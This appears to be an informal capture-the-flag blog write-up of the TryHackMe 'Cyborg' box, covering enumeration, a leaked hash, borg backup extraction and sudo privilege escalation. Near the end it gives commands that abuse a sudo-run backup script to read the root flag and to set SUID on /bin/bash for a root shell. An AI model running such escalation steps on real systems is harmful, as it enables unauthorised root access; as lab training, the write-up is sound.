Cyborg - THM

A box involving encrypted archives, source code analysis and more.

Yo homie! As always, let's start with an nmap, which shows ssh and http open.

We visit the website and it an apache config page. Using gobuster we some some folders to start with

We gotta make sure to fully enumerate this time. The last few times we've been forgetting to gobuster the folders too. Thankfully we did, there's some sub-folders under /etc: /squid - which has another sub-folder in it: /passwd. That looks about as far as we can go, so let's visit.

awww Yeah! we gots tha goodies!

/admin: It looks like we have someone named Alex who is a music producer from the UK who's played the piano since age 5.

/etc/squid: contains two files: passwd and squid.conf.

passwd:

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

squid.conf:

-- Specifies the command for the external authenticator.
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd

-- The maximum number of authenticator processes to spawn.
auth_param basic children 5

-- Specifies the protection scope (aka realm name) to be reported to the client for the authentication scheme.
auth_param basic realm Squid Basic Authentication

--Specifies how long squid assumes an externally validated username:password pair is valid for
auth_param basic credentialsttl 2 hours

-- To use authentication you must in addition make use of ACLs based on login name in http_access
acl auth_users proxy_auth REQUIRED

http_access allow auth_users

Note: auth_param is used to define parameters for the various authentication schemes supported by Squid.

format: auth_param scheme parameter [setting]

Welp, we're gonna have to put on our thinkin' caps here. The password looks like a username and password combo? For the conf file, I'll have to research this code 'cause I ain't no programmer... I'll mark up my understanding in yellow above but my first hit was this page: squid : auth_param configuration directive (squid-cache.org).

Starting out, those credentials didn't work for SSH but the username is right, so that's a win - we'll start a hydra while we keep going.

Poking back into the /admin page source code we see a reference to an /admin.html - so let's poke at that. Looks like an admin shoutbox is there.

############################################
                ############################################
                [Yesterday at 4.32pm from Josh]
                Are we all going to watch the football game at the weekend??
                ############################################
                ############################################
                [Yesterday at 4.33pm from Adam]
                Yeah Yeah mate absolutely hope they win!
                ############################################
                ############################################
                [Yesterday at 4.35pm from Josh]
                See you there then mate!
                ############################################
                ############################################
                [Today at 5.45am from Alex]
                Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier.
                I decided to give up like i always do ahahaha sorry about that.
                I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process.
                Might pass it over to the IT guys but in the meantime all the config files are laying about.
                And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol.
                other than that im pretty sure my backup "music_archive" is safe just to confirm.
                ############################################
                ############################################

There is also an archive.tar file there - so let's grab that. Well, well...

so in there is a bunch of .5 files that look like compiled data, the config file has a key and nonce has a weird string of numbers.

Well... I had to look at the writeup. Looks like that username/password find we had was actually a hashed password. Very frustrated with myself for not validating hash types with hashid.

That's great an all but it doesn't give us SSH access so let's continue. Continuing to look at the writeup, we see this borg backup could have more information on their site. I went their earlier and it was down so I assumed it wasn't a real site... turns out it is.

So we'll hit up https://borgbackup.readthedocs.io/ and install the software. We'll be decrypting this archive but I have to stop and point out so many obvious things that I missed. Firstly, the documentation online gives different syntax than the documentation from the application help. We'll need to be using this to decrypt

$ borg extract /path/to/repo::my-files

Okay so what does that mean? The path to repo part will be where the files we extracted are located. The "my-files" portion - this is what got me. If you remember above, Alex named his backup "music_archive" in that admin shoutbox - so that's what we'll be using.

Whew... I would NOT have gotten that by myself. I'm thinking "easy" means something different to people who are further along in this journey than I am lol. Okay so we poke around in the restored backup and find a password. This BETTER give us an SSH session... this room is trying my patience.

THANK GOD!!!!

Ok, let's see what our buddy Alex has access to.

Okay so let's drill through this program dawg.

#!/bin/bash

-- Find all MP3's then pipe them into both the screen output and a log file
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

-- Use the found files as the variable input
input="/etc/mp3backups/backed_up_files.txt"

--This stuff's all commented out yo - we don't need that meat dawg
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

-- Looks for passed options when running the script... hmmmm. It then passes those to the command variable.
while getopts c: flag
do
	case "${flag}" in 
		c) command=${OPTARG};;
	esac
done


-- sets the backup_files variable to the files.
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

-- I think this should echo out our getopts flag if we get that flag right
cmd=$($command)
echo $cmd

Well here we go son! We used this to get a handle on how getopts works, then launched the script with the parameters it wanted:

sudo /etc/mp3backups/backup.sh -c /root/root.txt

That popped us the flag!

Although it's not an actual root shell, we got what we wanted.

If you want to know how to do a full shell on it, visit the walk through here (Cyborg Writeup(My box!) | fieldraccoon). I had tried a few commands but didn't think of adding SUID bits.

sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"

Then running this to get a shell.

bash -p